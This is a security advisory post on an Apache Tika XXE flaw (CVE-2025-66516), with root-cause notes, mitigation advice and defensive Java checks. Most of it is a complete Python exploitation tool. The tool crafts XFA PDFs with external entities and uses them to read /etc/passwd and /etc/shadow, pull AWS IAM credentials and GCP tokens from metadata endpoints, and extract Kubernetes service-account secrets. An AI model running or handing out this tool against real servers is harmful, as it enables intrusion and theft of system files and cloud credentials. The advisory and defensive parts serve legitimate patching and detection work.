Apache Tika XML External Entity (XXE) Injection Vulnerability (CVE-2025-66516)

2025. 12. 28. 15:48

1. Apache Tika

- A library used to detect and extract metadata and text from uploaded documents (PDF, Office, etc.) [1]

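2. Vulnerability

- An XML external entity (XXE) vulnerability (CVSS: 10.0) caused by an incomplete implementation of external-entity blocking in the XML parsing that tika-core performs on XFA content [3]

Affected versions
- org.apache.tika:tika-core 1.13 through 3.2.1 (inclusive)
- org.apache.tika:tika-parsers 1.13 up to, but not including, 2.0.0
- org.apache.tika:tika-parser-pdf-module 2.0.0 through 3.2.1 (inclusive)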
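
The ranges above can be turned into a quick dependency check. The following is a minimal sketch, not an official tool: the class name TikaVersionCheck and its methods are hypothetical, and it only understands plain numeric versions such as 3.2.1 (qualifiers such as -BETA are not handled and would raise NumberFormatException).

```java
final class TikaVersionCheck {

    // Parse "major.minor.patch" into three ints; missing parts count as 0.
    static int[] parse(String version) {
        String[] parts = version.split("\\.");
        int[] nums = new int[3];
        for (int i = 0; i < parts.length && i < 3; i++) {
            nums[i] = Integer.parseInt(parts[i]);
        }
        return nums;
    }

    // Negative if a < b, zero if equal, positive if a > b.
    static int compare(String a, String b) {
        int[] x = parse(a);
        int[] y = parse(b);
        for (int i = 0; i < 3; i++) {
            if (x[i] != y[i]) {
                return Integer.compare(x[i], y[i]);
            }
        }
        return 0;
    }

    // Encodes the affected ranges listed in this post for the three artifacts.
    static boolean isAffected(String artifactId, String version) {
        switch (artifactId) {
            case "tika-core":
                return compare(version, "1.13") >= 0 && compare(version, "3.2.1") <= 0;
            case "tika-parsers":
                return compare(version, "1.13") >= 0 && compare(version, "2.0.0") < 0;
            case "tika-parser-pdf-module":
                return compare(version, "2.0.0") >= 0 && compare(version, "3.2.1") <= 0;
            default:
                return false; // artifact not covered by this advisory
        }
    }

    public static void main(String[] args) {
        System.out.println("tika-core 3.2.1 affected: " + isAffected("tika-core", "3.2.1"));
        System.out.println("tika-core 3.2.2 affected: " + isAffected("tika-core", "3.2.2"));
    }
}
```

A build script or inventory job could feed it the artifactId and version pairs taken from a dependency report.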

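- XMLReaderUtils.getXMLInputFactory() configures IGNORING_STAX_ENTITY_RESOLVER, which is intended to block external entities

> The resolver returns a String instead of the expected InputStream

> The JDK's default StAX parser silently ignores the invalid return type and falls back to its default behavior

> As a result, when the XFA (XML Forms Architecture) data contains an external entity, the resolver has no effect and the parser attempts to resolve the external entity as-is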
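
The return-type problem can be illustrated with a small sketch. The javax.xml.stream.XMLResolver contract documents three accepted return types (InputStream, XMLStreamReader, XMLEventReader), and a null return means "use the default mechanism". The class ResolverContractDemo and both resolver constants below are hypothetical stand-ins written for this post; they are not Tika's code, and the empty-stream variant is only one possible way to satisfy the contract.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import javax.xml.stream.XMLEventReader;
import javax.xml.stream.XMLResolver;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

final class ResolverContractDemo {

    // Same shape as the resolver described above: it returns a String,
    // which is not one of the types the XMLResolver contract documents.
    static final XMLResolver STRING_RESOLVER =
            (publicId, systemId, baseUri, namespace) -> "";

    // Hypothetical alternative: an empty InputStream, which is a documented type.
    static final XMLResolver EMPTY_STREAM_RESOLVER =
            (publicId, systemId, baseUri, namespace) -> new ByteArrayInputStream(new byte[0]);

    // True only for the three return types documented for resolveEntity.
    static boolean isContractType(Object result) {
        return result instanceof InputStream
                || result instanceof XMLStreamReader
                || result instanceof XMLEventReader;
    }

    // Calls the resolver with a placeholder system ID and checks what comes back.
    static boolean honoursContract(XMLResolver resolver) {
        try {
            Object result = resolver.resolveEntity(null, "file:///placeholder", null, null);
            return isContractType(result);
        } catch (XMLStreamException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println("String resolver honours contract: "
                + honoursContract(STRING_RESOLVER));
        System.out.println("Empty-stream resolver honours contract: "
                + honoursContract(EMPTY_STREAM_RESOLVER));
    }
}
```

A parser that receives a value outside the contract is free to discard it, which matches the fallback behavior described above.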

public static XMLInputFactory getXMLInputFactory() {
    XMLInputFactory factory = XMLInputFactory.newFactory();
    tryToSetStaxProperty(factory, XMLInputFactory.IS_NAMESPACE_AWARE, true);
    tryToSetStaxProperty(factory, XMLInputFactory.IS_VALIDATING, false);
    factory.setXMLResolver(IGNORING_STAX_ENTITY_RESOLVER); // resolver intended to block external entities
    return factory;
}

Impact by parser configuration
① tika-server-standard.jar
- Bundles Woodstox (a StAX XML parser implementation), which effectively blocks XXE
② tika-core + parser modules (embedded usage)
- Vulnerable, because the JDK's default StAX parser is used
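
Because the impact depends on which StAX implementation is on the classpath, an embedding application can check this at startup. The sketch below is an assumption-laden probe: the class StaxImplementationProbe is hypothetical, and the package prefixes used for classification (com.ctc.wstx for Woodstox, com.sun.xml.internal.stream for the JDK's built-in implementation) are the ones these implementations are expected to use, so verify them against your own runtime.

```java
import javax.xml.stream.XMLInputFactory;

final class StaxImplementationProbe {

    // Name of the factory class the standard StAX lookup resolves to in this JVM.
    static String activeFactoryClass() {
        return XMLInputFactory.newFactory().getClass().getName();
    }

    // Rough classification based on package prefix (assumed prefixes, see lead-in).
    static String classify(String className) {
        if (className.startsWith("com.ctc.wstx.")) {
            return "woodstox";
        }
        if (className.startsWith("com.sun.xml.internal.stream.")) {
            return "jdk-default";
        }
        return "other";
    }

    public static void main(String[] args) {
        String name = activeFactoryClass();
        System.out.println("StAX factory: " + name + " (" + classify(name) + ")");
    }
}
```

Running this inside the same classpath as the embedded Tika usage indicates which of the two configurations above applies.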

2.1 PoC

- Build a minimal PDF that contains XFA, structured so that the XXE entity actually passes through the extraction path [4]

#!/usr/bin/env python3
"""
CVE-2025-66516 Automated Exploitation Tool
===========================================

Full-chain exploitation tool for Apache Tika XXE vulnerability.
Automatically generates payloads, tests against target, and extracts data.

VULNERABILITY BACKGROUND:
-------------------------
Apache Tika versions 1.13 through 3.2.1 fail to properly configure the
underlying StAX XML parser to disable external entity resolution when
processing XFA data within PDF documents.

THE INCIDENTAL WOODSTOX PROTECTION:
-----------------------------------
The standard tika-server-standard.jar bundles the Woodstox XML parser,
which has secure defaults and blocks external entity resolution. This
tool is effective against:
  - Embedded Tika deployments using JDK's default StAX parser
  - Custom deployments without Woodstox on classpath
  - Applications explicitly using the JDK reference implementation

USAGE:
------
  # Basic file read exploitation
  python exploit.py --url http://target:9998 --file /etc/passwd

  # Test if target is vulnerable
  python exploit.py --url http://target:9998 --check

  # AWS metadata theft (SSRF)
  python exploit.py --url http://target:9998 --aws-metadata

  # Read multiple files
  python exploit.py --url http://target:9998 --file /etc/passwd --file /etc/shadow

  # Kubernetes secrets extraction
  python exploit.py --url http://target:9998 --k8s-secrets

  # Save extracted data to file
  python exploit.py --url http://target:9998 --file /etc/passwd --save output.txt
"""

import sys
import io
import os
import re
import argparse
import tempfile

try:
    import requests
except ImportError:
    print("Error: requests library required. Install with: pip install requests")
    sys.exit(1)


class TikaExploit:
    """Automated exploitation of CVE-2025-66516"""

    def __init__(self, tika_url, timeout=30, verbose=False):
        self.tika_url = tika_url.rstrip('/')
        self.timeout = timeout
        self.verbose = verbose
        self.session = requests.Session()

    def log(self, message):
        """Print verbose output"""
        if self.verbose:
            print(f"[DEBUG] {message}")

    def check_connectivity(self):
        """Verify Tika server is reachable"""
        try:
            resp = self.session.get(f"{self.tika_url}/version", timeout=5)
            if resp.status_code == 200:
                return True, resp.text.strip()
            return False, f"HTTP {resp.status_code}"
        except requests.RequestException as e:
            return False, str(e)

    def generate_payload_pdf(self, target):
        """Generate PDF with XXE payload targeting specified file/URL"""
        if target.startswith("http://") or target.startswith("https://"):
            entity_uri = target
        else:
            entity_uri = f"file://{target}"

        xfa_content = f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
  <!ENTITY xxe SYSTEM "{entity_uri}">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
<config xmlns="http://www.xfa.org/schema/xci/3.1/">
  <present><pdf><version>1.7</version></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
  <subform name="form1" layout="tb">
    <pageSet><pageArea><contentArea/><medium stock="letter"/></pageArea></pageSet>
    <subform>
      <field name="data"><ui><textEdit/></ui><value><text>&xxe;</text></value></field>
    </subform>
  </subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
  <xfa:data><form1><data>&xxe;</data></form1></xfa:data>
</xfa:datasets>
</xdp:xdp>'''

        # Build minimal PDF
        pdf = io.BytesIO()
        offsets = {}

        def write(data):
            if isinstance(data, str):
                data = data.encode('utf-8')
            pdf.write(data)

        def obj_start(num):
            offsets[num] = pdf.tell()

        write(b'%PDF-1.7\n%\xe2\xe3\xcf\xd3\n')
        obj_start(1)
        write(b'1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>\nendobj\n')
        obj_start(2)
        write(b'2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n')
        obj_start(3)
        write(b'3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\nendobj\n')
        obj_start(4)
        write(b'4 0 obj\n<< /Length 0 >>\nstream\nendstream\nendobj\n')
        obj_start(5)
        write(b'5 0 obj\n<< /Fields [] /XFA 6 0 R /NeedAppearances true >>\nendobj\n')

        xfa_bytes = xfa_content.encode('utf-8')
        obj_start(6)
        write(f'6 0 obj\n<< /Length {len(xfa_bytes)} >>\nstream\n'.encode())
        write(xfa_bytes)
        write(b'\nendstream\nendobj\n')

        xref_offset = pdf.tell()
        write(b'xref\n0 7\n0000000000 65535 f \n')
        for i in range(1, 7):
            write(f'{offsets.get(i, 0):010d} 00000 n \n'.encode())
        write(f'trailer\n<< /Size 7 /Root 1 0 R >>\nstartxref\n{xref_offset}\n%%EOF\n'.encode())

        return pdf.getvalue()

    def send_payload(self, pdf_data):
        """Send PDF payload to Tika and return response"""
        try:
            resp = self.session.put(
                f"{self.tika_url}/tika",
                data=pdf_data,
                headers={"Content-Type": "application/pdf"},
                timeout=self.timeout
            )
            return resp.status_code, resp.text
        except requests.RequestException as e:
            return None, str(e)

    def extract_data(self, response_text, target):
        """Extract exfiltrated data from Tika response"""
        # Look for data in XFA form field output
        # Tika outputs XFA field data in format: fieldName="data">data: CONTENT</li>
        patterns = [
            r'fieldName="data">data:\s*(.*?)</li>',
            r'<data>(.*?)</data>',
            r'<text>(.*?)</text>',
        ]

        for pattern in patterns:
            matches = re.findall(pattern, response_text, re.DOTALL)
            for match in matches:
                content = match.strip()
                # Filter out empty or placeholder content
                if content and content != "test" and content != "&xxe;":
                    return content

        return None

    def exploit_file(self, file_path):
        """Attempt to read a file from target system"""
        self.log(f"Generating payload for: {file_path}")
        pdf_data = self.generate_payload_pdf(file_path)

        self.log(f"Sending {len(pdf_data)} byte payload to {self.tika_url}")
        status, response = self.send_payload(pdf_data)

        if status is None:
            return {"success": False, "error": response}

        if status != 200:
            return {"success": False, "error": f"HTTP {status}"}

        extracted = self.extract_data(response, file_path)
        if extracted:
            return {"success": True, "data": extracted, "target": file_path}
        else:
            return {"success": False, "error": "No data extracted (target may be protected by Woodstox)"}

    def exploit_ssrf(self, url):
        """Perform SSRF attack"""
        self.log(f"Generating SSRF payload for: {url}")
        pdf_data = self.generate_payload_pdf(url)

        self.log(f"Sending SSRF payload to {self.tika_url}")
        status, response = self.send_payload(pdf_data)

        if status is None:
            return {"success": False, "error": response}

        if status != 200:
            return {"success": False, "error": f"HTTP {status}"}

        extracted = self.extract_data(response, url)
        if extracted:
            return {"success": True, "data": extracted, "target": url}
        else:
            return {"success": False, "error": "No data extracted"}

    def check_vulnerable(self):
        """
        Check if target is vulnerable by attempting to read /etc/passwd
        or a non-existent file (to detect error-based information disclosure)
        """
        # Try to read /etc/passwd
        result = self.exploit_file("/etc/passwd")
        if result["success"]:
            return True, "Target is VULNERABLE - file read confirmed"

        # Try a canary file - if we get a specific error, XXE is working
        canary = "/tmp/xxe_test_nonexistent_12345"
        pdf_data = self.generate_payload_pdf(canary)
        status, response = self.send_payload(pdf_data)

        if status == 200:
            # Check for error messages indicating XXE processing
            if "FileNotFoundException" in response or "No such file" in response:
                return True, "Target is VULNERABLE - error-based XXE confirmed"

        return False, "Target appears protected (likely using Woodstox)"


def main():
    parser = argparse.ArgumentParser(
        description='CVE-2025-66516 Automated Exploitation Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s --url http://target:9998 --check
  %(prog)s --url http://target:9998 --file /etc/passwd
  %(prog)s --url http://target:9998 --aws-metadata
  %(prog)s --url http://target:9998 --k8s-secrets
  %(prog)s --url http://target:9998 --file /etc/passwd --save loot.txt
        """
    )
    parser.add_argument('--url', '-u', required=True, help='Target Tika server URL')
    parser.add_argument('--file', '-f', action='append', help='File to read (can specify multiple)')
    parser.add_argument('--ssrf', '-s', action='append', help='URL for SSRF (can specify multiple)')
    parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
    parser.add_argument('--aws-metadata', action='store_true', help='Attempt AWS metadata extraction')
    parser.add_argument('--gcp-metadata', action='store_true', help='Attempt GCP metadata extraction')
    parser.add_argument('--k8s-secrets', action='store_true', help='Attempt Kubernetes secrets extraction')
    parser.add_argument('--save', help='Save extracted data to file')
    parser.add_argument('--timeout', type=int, default=30, help='Request timeout in seconds')
    parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')

    args = parser.parse_args()

    print("""
+==============================================================+
|  CVE-2025-66516 Apache Tika XXE Exploitation Tool            |
|  For authorized security testing only                        |
+==============================================================+
    """)

    exploit = TikaExploit(args.url, timeout=args.timeout, verbose=args.verbose)

    # Check connectivity
    print(f"[*] Target: {args.url}")
    reachable, version = exploit.check_connectivity()
    if not reachable:
        print(f"[-] Cannot reach target: {version}")
        return 1
    print(f"[+] Tika version: {version}")

    results = []

    # Vulnerability check
    if args.check:
        print("\n[*] Checking vulnerability status...")
        vulnerable, message = exploit.check_vulnerable()
        if vulnerable:
            print(f"[+] {message}")
        else:
            print(f"[-] {message}")
        return 0 if vulnerable else 1

    # File read attacks
    if args.file:
        print(f"\n[*] Attempting to read {len(args.file)} file(s)...")
        for file_path in args.file:
            print(f"\n[*] Target: {file_path}")
            result = exploit.exploit_file(file_path)
            if result["success"]:
                print(f"[+] SUCCESS - Data extracted:")
                print("-" * 50)
                print(result["data"][:2000])
                if len(result["data"]) > 2000:
                    print(f"... [{len(result['data']) - 2000} more bytes]")
                print("-" * 50)
                results.append(result)
            else:
                print(f"[-] Failed: {result['error']}")

    # SSRF attacks
    if args.ssrf:
        print(f"\n[*] Attempting {len(args.ssrf)} SSRF request(s)...")
        for url in args.ssrf:
            print(f"\n[*] Target: {url}")
            result = exploit.exploit_ssrf(url)
            if result["success"]:
                print(f"[+] SUCCESS - Response received:")
                print("-" * 50)
                print(result["data"][:2000])
                print("-" * 50)
                results.append(result)
            else:
                print(f"[-] Failed: {result['error']}")

    # AWS metadata
    if args.aws_metadata:
        print("\n[*] Attempting AWS metadata extraction...")
        aws_targets = [
            "http://169.254.169.254/latest/meta-data/",
            "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            "http://169.254.169.254/latest/dynamic/instance-identity/document",
        ]
        for url in aws_targets:
            print(f"\n[*] Target: {url}")
            result = exploit.exploit_ssrf(url)
            if result["success"]:
                print(f"[+] SUCCESS:")
                print(result["data"][:1000])
                results.append(result)

                # If we got IAM role name, try to get credentials
                if "iam/security-credentials/" in url and result["data"]:
                    role_name = result["data"].strip().split('\n')[0]
                    creds_url = f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}"
                    print(f"\n[*] Fetching credentials for role: {role_name}")
                    creds_result = exploit.exploit_ssrf(creds_url)
                    if creds_result["success"]:
                        print(f"[+] AWS CREDENTIALS EXTRACTED:")
                        print(creds_result["data"])
                        results.append(creds_result)

    # GCP metadata
    if args.gcp_metadata:
        print("\n[*] Attempting GCP metadata extraction...")
        gcp_targets = [
            "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
            "http://metadata.google.internal/computeMetadata/v1/project/project-id",
        ]
        for url in gcp_targets:
            print(f"\n[*] Target: {url}")
            result = exploit.exploit_ssrf(url)
            if result["success"]:
                print(f"[+] SUCCESS:")
                print(result["data"][:1000])
                results.append(result)

    # Kubernetes secrets
    if args.k8s_secrets:
        print("\n[*] Attempting Kubernetes secrets extraction...")
        k8s_targets = [
            "/var/run/secrets/kubernetes.io/serviceaccount/token",
            "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
            "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
        ]
        for file_path in k8s_targets:
            print(f"\n[*] Target: {file_path}")
            result = exploit.exploit_file(file_path)
            if result["success"]:
                print(f"[+] SUCCESS:")
                print(result["data"][:1000])
                results.append(result)

    # Save results
    if args.save and results:
        print(f"\n[*] Saving results to {args.save}")
        with open(args.save, 'w') as f:
            for r in results:
                f.write(f"=== {r['target']} ===\n")
                f.write(r['data'])
                f.write("\n\n")
        print(f"[+] Saved {len(results)} result(s)")

    # Summary
    print(f"\n{'='*60}")
    if results:
        print(f"[+] Exploitation successful: {len(results)} target(s) extracted")
        return 0
    else:
        print("[-] No data extracted - target may be protected by Woodstox")
        return 1


if __name__ == "__main__":
    sys.exit(main())
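
As a defensive counterpart to the PoC above, an upload pipeline can flag PDFs that carry both an /XFA entry and an external entity declaration before they reach Tika. This is only a triage heuristic under stated assumptions: the class XfaEntityHeuristic is hypothetical, and the check scans raw bytes, so it misses XFA data stored in compressed streams (the PoC above happens to use an uncompressed stream).

```java
import java.nio.charset.StandardCharsets;

final class XfaEntityHeuristic {

    // Flags raw PDF bytes that mention /XFA and declare a SYSTEM or PUBLIC entity.
    static boolean looksSuspicious(byte[] pdfBytes) {
        // ISO-8859-1 maps every byte to one char, so binary content survives decoding.
        String raw = new String(pdfBytes, StandardCharsets.ISO_8859_1);
        boolean hasXfa = raw.contains("/XFA");
        boolean hasEntityDecl = raw.contains("<!ENTITY");
        boolean hasExternalId = raw.contains("SYSTEM") || raw.contains("PUBLIC");
        return hasXfa && hasEntityDecl && hasExternalId;
    }

    public static void main(String[] args) {
        byte[] sample = ("%PDF-1.7\n<< /XFA 6 0 R >>\n"
                + "<!DOCTYPE d [<!ENTITY x SYSTEM \"file:///placeholder\">]>")
                .getBytes(StandardCharsets.ISO_8859_1);
        System.out.println("suspicious: " + looksSuspicious(sample));
    }
}
```

A match is a reason to quarantine or inspect the file, not proof of an attack; patching remains the actual fix.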

3. Mitigation

- Apply the update provided by the vendor

> DTD and external entity support are explicitly disabled at the factory level
> The existing IGNORING_STAX_ENTITY_RESOLVER was fixed to return a valid type
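
For code that builds its own StAX factory, the factory-level hardening described above can be sketched with the standard XMLInputFactory properties. This is an illustration under assumptions, not the actual Tika patch: the class HardenedStaxFactory, its methods, and the PROBE-MARKER self-test are hypothetical. The self-test writes a temporary file, references it through an external entity, and checks that its content does not show up in the parsed text.

```java
import java.io.IOException;
import java.io.StringReader;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

final class HardenedStaxFactory {

    // Disable DTD processing and external entities via standard StAX properties.
    static XMLInputFactory newHardenedFactory() {
        XMLInputFactory factory = XMLInputFactory.newFactory();
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return factory;
    }

    // Collects character data; returns null if the parser rejects the document.
    static String extractText(XMLInputFactory factory, String xml) {
        StringBuilder text = new StringBuilder();
        try {
            XMLStreamReader reader = factory.createXMLStreamReader(new StringReader(xml));
            while (reader.hasNext()) {
                if (reader.next() == XMLStreamConstants.CHARACTERS) {
                    text.append(reader.getText());
                }
            }
            reader.close();
        } catch (XMLStreamException e) {
            return null;
        }
        return text.toString();
    }

    // Self-test: true would mean the hardened factory still expands a file entity.
    static boolean leaksLocalFile() {
        try {
            Path probe = Files.createTempFile("xxe-probe", ".txt");
            try {
                Files.write(probe, "PROBE-MARKER".getBytes(StandardCharsets.UTF_8));
                String xml = "<?xml version=\"1.0\"?>"
                        + "<!DOCTYPE d [<!ENTITY x SYSTEM \"" + probe.toUri() + "\">]>"
                        + "<d>&x;</d>";
                String text = extractText(newHardenedFactory(), xml);
                return text != null && text.contains("PROBE-MARKER");
            } finally {
                Files.deleteIfExists(probe);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("hardened factory leaks local file: " + leaksLocalFile());
    }
}
```

Setting the properties directly, rather than relying on a resolver alone, keeps the protection independent of how a given parser treats the resolver's return value.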

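Vulnerability	Product	Affected versions	Fixed version
CVE-2025-66516	Apache Tika (org.apache.tika:tika-core)	1.13 through 3.2.1 (inclusive)	Apache Tika 3.2.2 or later
CVE-2025-66516	Apache Tika (org.apache.tika:tika-parsers)	1.13 up to, but not including, 2.0.0	Apache Tika 3.2.2 or later
CVE-2025-66516	Apache Tika (org.apache.tika:tika-parser-pdf-module)	2.0.0 through 3.2.1 (inclusive)	Apache Tika 3.2.2 or later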

4. References

[1] https://tika.apache.org/
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-66516
[3] https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC
[4] https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC/blob/main/poc/exploit.py
[5] https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k
[6] https://tika.apache.org/download.html
[7] https://archive.apache.org/dist/tika/
[8] https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&bbsId=B0000133&searchWrd=&menuNo=205020&pageIndex=2&categoryCode=&nttId=71915
